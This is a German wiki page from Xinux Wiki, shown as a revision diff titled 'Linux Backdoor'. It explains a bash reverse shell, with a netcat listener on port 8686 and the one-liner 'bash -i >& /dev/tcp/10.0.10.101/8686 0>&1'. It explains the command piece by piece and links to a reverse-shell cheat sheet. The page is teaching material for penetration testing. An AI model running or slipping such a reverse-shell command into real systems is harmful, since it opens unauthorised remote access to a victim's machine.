Linux Backdoor: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 11: Zeile 11:
 
=0>&1=  
 
=0>&1=  
 
Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.
 
Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.
 +
=Prinzip=
 +
{{#drawio:backdoor1}}
  
 
=Links=
 
=Links=
 
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 
*http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Version vom 13. März 2023, 19:08 Uhr

Angreifer

IP Angreifer 10.0.10.101

  • netcat -lp 8686

Opfer

  • bash -i >& /dev/tcp/10.0.10.101/8686 0>&1

bash -i

öffnet eine interaktive Shell

&>

leitet die Standardausgabe und den Fehler auf den Socket um, der für die IP 10.0.10.101 geöffnet ist, die auf Port 8686 lauschen würde

0>&1

Man kann es auch 0<&1 schreiben. Dies würde buchstäblich bedeuten, dass "0" an "1" angehängt ist, was bedeutet, dass stdin an stdout angehängt ist, und aus Punkt 2 wissen wir, dass die stdin für diesen Bash-Prozess für den Angreifer verfügbar ist, der Port 8686 abhört.

Prinzip

Links